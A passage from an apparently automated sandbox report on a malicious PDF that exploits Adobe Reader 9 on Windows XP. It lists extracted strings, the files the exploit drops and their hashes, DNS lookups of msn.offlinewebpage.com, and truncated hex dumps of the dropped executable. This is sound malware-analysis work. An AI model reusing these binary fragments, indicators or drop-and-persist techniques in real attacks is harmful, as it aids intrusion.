gt sind, klicken Sie auf %OK_BUTTON%.Nehmen Sie die zu konvertierenden Dokumente in die Liste unten auf.	AcroRd32.exe
enSuche im Web"%s" ist gesch	AcroRd32.exe
hlte Ziel verschoben werden.Portfolio &wiederherstellenWiederherstellenSoll die zuletzt gespeicherte Version von "%s" wiederhergestellt werden?Die bestehende Datei kann nicht geschlossen werden.Na&vigationsfenster ausblenden&Schaltfl	AcroRd32.exe
fsummen usw.Es wurde kein Wert angegeben. PDF417-Barcode [%1] kann nicht erstellt werden.Dynamische Bibliothek %s kann nicht geladen werdenFunktion %s kann nicht in dynamischer Bibliothek gefunden werdenSystemfehler: %sDynamische Bibliothek konnte f	AcroRd32.exe
%-24s%s	AdobeArm.tmp.dr, userinit.dll.dr
tzt.Das Muster "%s" konnte nicht gefunden werden. Ung	AcroRd32.exe
lt Kommentare oder Formulardaten, die auf %s platziert sein sollten. Dieses Dokument kann nicht gefunden werden. M	AcroRd32.exe
ffnenDie Datei konnte nicht gefunden werden.In Ihrem Ordner befinden sich %numfiles% Dateien. Es wird empfohlen, nicht mehr als %maxfiles% Dateien gleichzeitig hinzuzuf	AcroRd32.exe
t</h3><p>Standard: %STD%<br />ISO-Name: %ISO%<br />Status: <span style="color:#FF0000">	AcroRd32.exe
das Anzeigen von freigegebenen Seiten auf %server% aktiviert.TeilnehmenNicht teilnehmenF	AcroRd32.exe
scht werden?http://www.adobe.com/go/acrobat_de"%s"Einblenden:Format:Einstellungen...Adobe PDF-DateienAdobe PDF-Dateien, optimiertAdobe PDFXML-DateienAcrobat FDF-DateienAcrobat XFDF-DateienCatalog-IndexdateiJPEG-BilddateienBitmap-BilddateienPICT-BilddateienTIFF-BilddateienPNG-BilddateienJPEG2000-BilddateienAlle DateienAlle unterst	AcroRd32.exe
hlen Sie eine Multimediaanmerkung und ein Ziel aus.Unbenannt (Seite %n%)<Eingebettete Daten><keine Datei ausgew	AcroRd32.exe
nger gesendet werden.DatensatzAntwortdateipfad durchsuchenDie Datei %s konnte nicht ge	AcroRd32.exe
%s %s%s	cmd.exe
lt.Die Datei "%s" wurde nicht geteilt, da sie nur $NUM$ MB gro	AcroRd32.exe

+ SQL
String value	Source
select CONTENTS from	AcroRd32.exe
insert into "	AcroRd32.exe
select DATA from	AcroRd32.exe
create table "	AcroRd32.exe

+ URLs
String value	Source
http://api-dcdevlab.corp.adobe.com/	AcroRd32.exe
http://cgi.adobe.com/special/acrobat/update	AcroRd32.exe
http://maps.google.com/mapshttp://www.mapquest.com/maps/map.adphttp://maps.yahoo.com/zum	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:bcc	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:cc	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:connectionstatus	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:docid	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:doclink	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:doctitle	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:extrainfo	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:folder	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:hasconnected	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:isinitiated	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:isoffline	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:isonline	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:lastsync	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:latestversion	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:location	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:method	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:newresponses	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:recipients	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:remoteurl	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:responses	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:serverreviews	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:to	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/forms/:workspace	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/inbox/	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/inbox/:hidden	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:bcc	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:cc	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:connectionstatus	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:docid	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:doclink	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:doctitle	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:folder	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:hasconnected	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:isinitiated	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:isoffline	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:isonline	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:lastsync	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:latestversion	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:location	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:locationpathtype	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:method	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:remoteurl	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:serverreviews	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:to	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:workspace	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/workflows/	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/workflows/:deletelink	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/workflows/:docid	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/workflows/:doclink	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/workflows/:doctitle	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/workflows/:haserror	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/workflows/:servererrors	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/workflows/:serverworkflows	AcroRd32.exe
http://ns.adobe.com/acrobat/rss/workflows/:type	AcroRd32.exe
http://ns.adobe.com/ix/1.0/	Bin Laden s successor.pdf.dr
http://ns.adobe.com/pdf/1.3/	Bin Laden s successor.pdf.dr
http://ns.adobe.com/xap/1.0/	Bin Laden s successor.pdf.dr
http://ns.adobe.com/xap/1.0/mm/	Bin Laden s successor.pdf.dr
http://purl.org/dc/elements/1.1/	Bin Laden s successor.pdf.dr
http://schemas.microsoft.com/sharepoint/soap/	AcroRd32.exe
http://www.ad	AcroRd32.exe
http://www.adobe.com/go/accessibility_de	AcroRd32.exe
http://www.adobe.com/go/acrobat_de	AcroRd32.exe
http://www.adobe.com/go/acrobat_deder/die	AcroRd32.exe
http://www.adobe.com/go/acrobat_dedie	AcroRd32.exe
http://www.adobe.com/go/acrobat_dediese	AcroRd32.exe
http://www.adobe.com/go/acrobat_dehttp://www.adobe.com/go/acrofamily_dewahl	AcroRd32.exe
http://www.adobe.com/go/acrobat_manage_acct_dehttp://www.adobe.com/go/acrobat_change_passwd_dehttp://www.adobe.com/go/reader_manage_acct_dehttp://www.adobe.com/go/reader_change_passwd_de%stxt.pdf&weiter&zur	AcroRd32.exe
http://www.adobe.com/go/acrobat_passwordhttp://www.adobe.com/go/reader_passwordhttp://www.adobe.com/go/acro_com_learn_moreaktuelle	AcroRd32.exe
http://www.adobe.com/go/apipfaq_dehttp://www.adobe.com/go/privacy_deder	AcroRd32.exe
http://www.adobe.com/go/expert_support_dehttp://www.adobe.com/go/acrobat_support_dehttp://www.adobe.com/go/acrreader_dehttp://www.adobe.com/go/accessibility_deacrobat-installation	AcroRd32.exe
http://www.adobe.com/go/partners_cds_dehttp://www.adobe.com/go/reader_download_dedatei	AcroRd32.exe
http://www.adobe.com/go/pima_de).verwendet	AcroRd32.exe
http://www.adobe.com/go/reader_download_de	AcroRd32.exe
http://www.adobe.com/go/reader_download_de&reader-hilfe	AcroRd32.exe
http://www.adobe.com/go/reader_download_de.der/die	AcroRd32.exe
http://www.adobe.com/go/reader_pdf_deadobe	AcroRd32.exe
http://www.adobe.com/go/rsasecurity_de.	AcroRd32.exe
http://www.adobe.com/go/sc_learn_morethis	AcroRd32.exe
http://www.adobe.com/go/section508_de.zul	AcroRd32.exe
http://www.adobe.com/go/security_checkpointseinige	AcroRd32.exe
http://www.adobe.com/go/thirdparty_de.	AcroRd32.exe
http://www.adobe.com/products/acrobat/readstep2.html	AcroRd32.exe
http://www.adobe.com/support/techdocs/332720.htmlhttp://www.adobe.com/support/jp/support/acro8j_prn.html&zoomall&gemein&erweiterte	AcroRd32.exe
http://www.apache.org/)	AcroRd32.exe
http://www.dictionary.com/cgi-bin/dict.pl?term=	AcroRd32.exe
http://www.iec.ch	AcroRd32.exe
http://www.monotype.com	AcroRd32.exe
http://www.quicktime.com	AcroRd32.exe
http://www.w3.org/1999/02/22-rdf-syntax-ns#	Bin Laden s successor.pdf.dr
http://www.w3.org/1999/xhtml	AcroRd32.exe
http://www.xfa.org/schema/xci/2.6/	AcroRd32.exe
http://www.xfa.org/schema/xfa-template/2.1/	AcroRd32.exe
https://api.share.acrobat.com	AcroRd32.exe
https://api.share.acrobat.com/webservices/api/v1/	AcroRd32.exe
https://api.share.adobe.com/	AcroRd32.exe
https://idisk.mac.com/	AcroRd32.exe
https://services.acrobat.com	AcroRd32.exe
https://tob.acrobat.com/tob/	AcroRd32.exe

+ Social media names
String value	Source
hlen Sie diese Option, wenn Sie einen Internet-E-Mail-Dienst wie Yahoo oder Microsoft Hotmail verwenden.Speichern Sie dann Ihr Formular und senden Sie es equals www.hotmail.com (Hotmail)	AcroRd32.exe
hlen Sie diese Option, wenn Sie einen Internet-E-Mail-Dienst wie Yahoo oder Microsoft Hotmail verwenden.Speichern Sie dann Ihr Formular und senden Sie es equals www.yahoo.com (Yahoo)	AcroRd32.exe
ngengradhttp://maps.google.com/mapshttp://www.mapquest.com/maps/map.adphttp://maps.yahoo.com/Zum eingegebenen L equals www.yahoo.com (Yahoo)	AcroRd32.exe

Analysis Overview

+ Startup

system is xp

AcroRd32.exe (PID: 3208 MD5: 98536D980F14545816DD33998146EE9C)

AdobeArm.tmp (PID: 4076 MD5: 4353E469D8B4A7BAE876C81D3CAAA0D1)

cmd.exe (PID: 2172 MD5: 6D778E0F95447E6546553EEEA709D03C)

AcroRd32.exe (PID: 1904 MD5: 98536D980F14545816DD33998146EE9C)

cleanup

+ Dropped Files
File Path	MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	46FE9C870F8032C974BBFF3F86CB13D8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	8B1B268DE84325ABC8A3F50D6A23F651
C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll	5D4877E3603149372CA210A8D2B60492
C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.exe (copy)	46FE9C870F8032C974BBFF3F86CB13D8
C:\Documents and Settings\All Users\Application Data\desktop.BIN (copy)	46FE9C870F8032C974BBFF3F86CB13D8

+ Involved Domains
Name	IP	Name Server	ASN	ASN Description	ANS State	Registrar	e-Mail
msn.offlinewebpage.com	unknown	unknown	unknown	unknown	unknown	unknown	unknown

+ Involved IP Addresses
IP	ASN	ASN Description	ANS State
195.186.1.121	AS44038	BLUEWIN-AS Swisscom (Schweiz) AG	CH

Global Network Data

+ All UDP
Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2011 14:36:59.813680887 CET	59202	53	192.168.0.10	195.186.1.121
Dec 2, 2011 14:37:00.800487995 CET	59202	53	192.168.0.10	195.186.1.121
Dec 2, 2011 14:37:01.677712917 CET	53	59202	195.186.1.121	192.168.0.10
Dec 2, 2011 14:37:02.245681047 CET	53	59202	195.186.1.121	192.168.0.10

+ All ICMP
Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 2, 2011 14:37:02.246319056 CET	192.168.0.10	195.186.1.121	8324	(Port unreachable)	Destination Unreachable
Dec 2, 2011 14:37:10.188484907 CET	192.168.0.10	192.168.0.2	4c5e		Echo
Dec 2, 2011 14:37:10.188502073 CET	192.168.0.2	192.168.0.10	545e		Echo Reply

+ DNS Query
Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 2, 2011 14:36:59.813680887 CET	192.168.0.10	195.186.1.121	0x5d3b	Standard query (0)	msn.offlinewebpage.com	A (IP address)	IN (0x0001)
Dec 2, 2011 14:37:00.800487995 CET	192.168.0.10	195.186.1.121	0x5d3b	Standard query (0)	msn.offlinewebpage.com	A (IP address)	IN (0x0001)

+ DNS Answer
Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	CName	Address	Type	Class
Dec 2, 2011 14:37:01.677712917 CET	195.186.1.121	192.168.0.10	0x5d3b	Name error (3)	msn.offlinewebpage.com	none	none	A (IP address)	IN (0x0001)
Dec 2, 2011 14:37:02.245681047 CET	195.186.1.121	192.168.0.10	0x5d3b	Name error (3)	msn.offlinewebpage.com	none	none	A (IP address)	IN (0x0001)

Hooks

Analysis File: AcroRd32.exe PID: 3208 Parent PID: 3136

+ Sections

+ General
Start time:	05:25:03
Start date:	02/12/2011
Path:	C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
Commandline:	not known
Imagebase:	0x400000
File size:	349616 bytes
MD5 hash:	98536D980F14545816DD33998146EE9C

File Activities:

+ File created
File Path	Access	Attributes	Options	Completion	Count	Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	read attributes and synchronize and generic read and generic write	normal	synchronous io non alert and non directory file	success or wait	1	4FE01BF
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	read attributes and synchronize and generic read and generic write	normal	synchronous io non alert and non directory file	success or wait	1	4FE03C6

+ File written
File Path	Offset	Length	Value	Completion	Count	Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	55 8B EC B8 14 22 00 00 E8 03 09 00 00 53 56 57 B9 42 00 00 00 BE 10 30 40 00 8D BD 54 E6 FF FF 8D 85 88 F3 FF FF F3 A5 50 E8 B2 05 00 00 83 C4 04 85 C0 0F 84 4A 04 00 00 B9 80 00 00 00 33 C0 8D BD B0 FB FF FF 8D 95 B0 FB FF FF F3 AB 8D 4D F8 C7 45 F8 00 01 00 00 51 52 FF 15 00 20 40 00 8B 35 28 20	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	40 00 8D 85 F0 FD FF FF 6A 00 8D 8D A0 F7 FF FF 50 51 FF D6 E9 C3 00 00 00 8B 35 80 20 40 00 6A 64 FF D6 6A 64 FF D6 8D 95 D4 E6 FF FF 52 E8 CD 00 00 00 83 C4 04 89 85 84 F3 FF FF 85 C0 74 DF 8D 85 74 ED FF FF 50 FF 15 88 20 40 00 85 C0 74 2E 68 18 31 40 00 50 FF 15 8C 20 40 00 8B F0 85 F6 74 1C 8D	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	24 14 3C 00 00 00 C7 44 24 20 FC 31 40 00 89 54 24 24 89 44 24 28 C7 44 24 18 40 00 00 00 FF D7 8B 35 68 20 40 00 50 FF D6 8B 1D 64 20 40 00 6A 0F FF D3 8B 2D 60 20 40 00 50 FF D5 8D 4C 24 10 51 FF 15 EC 20 40 00 85 C0 74 41 8B 54 24 48 6A 40 52 FF D6 8B 44 24 48 6A 01 50 FF 15 5C 20 40 00 8D 4C 24	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	96 26 00 00 00 00 00 00 5C 23 00 00 68 23 00 00 7A 23 00 00 86 23 00 00 9A 23 00 00 B0 23 00 00 BC 23 00 00 C8 23 00 00 D4 23 00 00 E0 23 00 00 F2 23 00 00 04 24 00 00 20 24 00 00 30 24 00 00 46 23 00 00 4A 24 00 00 58 24 00 00 68 24 00 00 76 24 00 00 86 24 00 00 98 24 00 00 A8 24 00 00 C2 24 00 00	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	73 74 57 00 6C 00 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E 61 70 73 68 6F 74 00 00 E0 01 47 65 74 56 65 72 73 69 6F 6E 45 78 57 00 F5 01 47 6C 6F 62 61 6C 46 72 65 65 00 00 97 03 57 72 69 74 65 46 69 6C 65 00 50 00 43 72 65 61 74 65 46 69 6C 65 57 00 5B 02 4C 6F 63 6B 52 65 73 6F 75 72	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6D 00 73 00 6E 00 2E 00 6F 00 66 00 66 00 6C 00 69 00 6E 00 65 00 77 00 65 00 62 00 70 00 61 00 67 00 65 00 2E 00 63 00 6F 00 6D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6D 00 73 00 6E 00 2E 00 6F 00 66 00 66 00 6C 00 69 00 6E 00	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 A0 00 00 80 20 00 00 80 10 00 00 00 38 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 66 00 00 00 50 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 68 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	8B 2D BC 70 00 10 59 83 7C 24 14 00 74 4C 56 6A 00 FF 74 24 1C E8 54 4C 00 00 FF 74 24 20 E8 17 0B 00 00 83 C4 10 FF 74 24 14 FF D5 8B D0 53 89 54 24 14 FF D5 8B 4C 24 10 03 C8 81 F9 FF FF 00 00 7D 07 FF 74 24 14 53 FF D7 FF 74 24 14 E8 27 4C 00 00 8B 2D BC 70 00 10 59 83 7C 24 18 00 74 4C 56 6A 00	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	00 00 7D 31 8D 85 F0 FD FF FF 50 FF 75 08 FF 15 B4 70 00 10 FF 45 F8 56 56 56 8D 45 F4 56 50 8D 85 F0 FB FF FF 50 C7 45 F4 00 02 00 00 FF 75 F8 FF 75 FC EB 85 FF 75 FC FF 15 18 70 00 10 5F 5B 5E C9 C3 55 8B EC 83 EC 28 8D 45 FC 50 68 19 00 02 00 6A 00 68 38 85 00 10 68 02 00 00 80 FF 15 14 70 00 10	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	00 10 51 8D 4D F8 51 8D 4D F0 51 8D 8D E8 AF FF FF 68 00 48 00 00 51 6A 03 6A 30 50 89 5D F0 89 5D F8 89 5D E8 FF D6 85 C0 75 2D 8B 45 F0 8D 4D E8 51 8D 4D F8 51 8D 4D F0 05 00 48 00 00 51 50 8D 85 E8 AF FF FF 50 6A 03 6A 30 FF 75 EC FF D6 85 C0 0F 84 94 01 00 00 68 98 88 00 10 68 88 88 00 10 68 70	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	89 5D F8 50 8D 85 E8 FD FF FF 50 57 57 68 94 89 00 10 FF 75 F0 FF 15 00 70 00 10 85 C0 0F 85 BB 02 00 00 8D 85 E8 FD FF FF 68 14 4A 02 10 50 FF 15 30 70 00 10 85 C0 0F 84 A1 02 00 00 8D 85 E8 FD FF FF 68 88 89 00 10 50 FF D6 8D 85 E8 FD FF FF 50 FF 75 08 FF D6 68 50 02 00 00 8D 85 98 FB FF FF 57 50	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	00 0F 86 DB 01 00 00 83 C0 0C 89 45 FC 8B 45 FC 53 6A 00 8B 40 F8 89 45 EC 8D 85 B8 FB FF FF 50 E8 49 3C 00 00 83 C4 0C FF 75 EC FF 15 7C 71 00 10 50 8D 85 B8 FB FF FF 68 10 8C 00 10 50 E8 89 3C 00 00 57 8D 85 B8 F3 FF FF 6A 00 50 E8 1C 3C 00 00 8D 85 B8 FB FF FF 50 E8 16 3C 00 00 50 8D 85 B8 FB FF	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	FF FF 50 E8 BE 38 00 00 83 C4 2C 8D 85 B8 F3 FF FF 50 FF 75 08 FF D6 FF 45 F8 8B 45 F0 8B 4D F8 83 45 FC 14 3B 08 0F 82 8F FE FF FF 8B 45 F0 50 E8 45 38 00 00 59 5F 5E 5B C9 C3 55 8B EC 81 EC 94 09 00 00 53 56 57 33 DB B9 FF 01 00 00 33 C0 8D BD 6E F6 FF FF 8B 35 B4 70 00 10 66 89 9D 6C F6 FF FF 68	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	5B C9 C3 55 8B EC 83 EC 34 53 56 57 6A 20 FF 75 08 8D 45 CC 33 F6 50 89 75 FC E8 C5 34 00 00 83 C4 0C 8D 4D FC 89 75 D0 6A 02 58 51 8D 4D CC 51 56 56 50 89 45 CC 89 45 D8 E8 CA 37 00 00 85 C0 0F 85 98 00 00 00 39 75 FC 0F 84 8F 00 00 00 83 4D F8 FF B8 00 28 00 00 50 89 45 F0 E8 7D 34 00 00 8B F8 59	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	F7 F9 83 C2 41 66 89 17 47 47 FF 4D 08 75 B6 5F 66 83 24 73 00 68 08 02 00 00 8D 85 E8 FD FF FF 6A 00 50 E8 46 30 00 00 83 C4 0C 8D 85 E8 FD FF FF 53 50 FF 15 B0 70 00 10 FF 75 0C 8D 85 E8 FD FF FF 50 68 D8 8D 00 10 53 E8 72 30 00 00 83 C4 10 5E 5B C9 C3 55 8B EC 81 EC 6C 08 00 00 53 56 BE FF FF 00	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	83 E1 03 83 E0 0F C1 E1 04 0B C1 59 8B F3 8D BD 64 FF FF FF F3 A5 A4 7C 0E 83 F8 40 7D 09 8A 84 05 64 FF FF FF EB 02 B0 3D 0F BE C0 89 45 EC 8B C2 C1 E8 08 8B CA 83 E0 0F C1 E9 16 C1 E0 02 83 E1 03 6A 10 0B C1 59 8B F3 8D BD 20 FF FF FF F3 A5 A4 7C 0E 83 F8 40 7D 09 8A 84 05 20 FF FF FF EB 02 B0 3D	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	FF FF 59 59 8D 85 64 EA FF FF 8D 4D E4 50 68 00 00 40 04 FF 75 0C FF 75 08 E8 A9 0C 00 00 85 C0 0F 84 5D 01 00 00 8D 45 E0 53 50 8D 45 F0 50 68 05 00 00 20 FF 75 EC C7 45 E0 04 00 00 00 FF 15 70 71 00 10 85 C0 0F 84 37 01 00 00 8B 45 F0 40 50 E8 2A 28 00 00 8B F8 59 3B FB 0F 84 22 01 00 00 8B 45 F0	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	74 26 53 8D 85 F4 FD FF FF 68 20 95 02 10 50 FF 15 74 70 00 10 53 8D 85 F4 FD FF FF 68 18 93 02 10 50 FF 15 74 70 00 10 56 8D 85 F4 FD FF FF 53 50 E8 38 24 00 00 8D 85 F4 FD FF FF 50 6A 02 FF 35 08 91 02 10 57 E8 3A FB FF FF 83 C4 1C 85 C0 74 4C 8D 85 F4 FD FF FF 85 C0 75 04 33 F6 EB 36 8D 85 F4 FD	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	84 A5 A5 A5 68 90 90 00 10 50 A5 E8 BC 20 00 00 83 C4 18 39 5D F0 C6 45 FC 02 89 5D EC BF 03 40 00 80 75 06 57 E8 7A 22 00 00 8B 75 F0 8D 4D EC 51 8D 4D C8 8B 06 53 51 53 56 FF 50 3C 3B C3 7D 0C 68 98 90 00 10 56 50 E8 65 22 00 00 39 5D EC 75 06 57 E8 4C 22 00 00 8B 45 EC 8D 55 B8 53 52 8B 08 6A 01	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	8D 85 8C FD FF FF 56 50 E8 43 1D 00 00 88 18 8B 45 08 59 8B 00 59 3B 45 0C 75 22 39 5D 10 74 0C 8D 85 8C FD FF FF 50 FF 75 10 FF D7 39 5D 14 74 0C 8D 85 8C FB FF FF 50 FF 75 14 FF D7 FF 45 FC 8B 45 FC 3B 45 F8 0F 82 36 FF FF FF FF 75 F4 FF 15 18 4A 02 10 FF 75 F0 EB 01 57 FF 15 78 70 00 10 5F 5E 5B	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	8D 85 BC FD FF FF 6A FF 50 56 56 FF 15 4C 70 00 10 8B 45 F4 50 8D 85 BC F3 FF FF 50 FF 15 B0 70 00 10 8D 85 BC F7 FF FF 50 FF 15 BC 70 00 10 8D 44 00 01 8B 3D 60 71 00 10 50 8D 85 BC F7 FF FF 50 8B 45 F8 6A 2B FF 70 08 FF D7 8D 85 BC F3 FF FF 50 FF 15 BC 70 00 10 8D 44 00 01 50 8D 85 BC F3 FF FF 50	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	83 C0 03 24 FC E8 86 14 00 00 8B C4 57 89 45 F4 50 66 89 30 8D 85 BC FD FF FF 6A FF 50 56 56 FF 15 4C 70 00 10 8B 45 F4 50 8D 85 BC F3 FF FF 50 FF 15 B0 70 00 10 8D 85 BC F7 FF FF 50 FF 15 BC 70 00 10 8D 44 00 01 8B 3D 60 71 00 10 50 8D 85 BC F7 FF FF 50 8B 45 F8 6A 2B FF 70 08 FF D7 8D 85 BC F3 FF	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	01 00 00 00 5B 59 59 C3 55 8B EC 51 83 3D 4C 8E 02 10 00 53 56 57 8B F1 75 05 E8 39 FD FF FF 8B 45 0C 8D 48 1F 8B 45 08 C1 E9 05 89 0E 8B 10 89 56 04 8B 50 04 89 56 08 8B 50 08 89 56 0C 8B 50 0C 83 E9 04 89 56 10 0F 84 69 01 00 00 49 49 0F 84 DF 00 00 00 49 49 0F 85 C3 01 00 00 8B 48 10 BF 24 5A 02	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	C9 C1 EA 08 33 34 8D 24 52 02 10 33 58 F8 0F B6 CA 8B D3 33 34 8D 24 4E 02 10 0F B6 4D F8 C1 EA 10 33 34 8D 24 4A 02 10 0F B6 D2 33 70 FC 8B CE 89 75 E8 C1 E9 18 8B 0C 8D 24 56 02 10 33 0C 95 24 52 02 10 8B 55 E0 C1 EA 08 0F B6 D2 33 0C 95 24 4E 02 10 0F B6 55 DC 33 0C 95 24 4A 02 10 33 08 8B D1 8B	success or wait	1	4FE025C
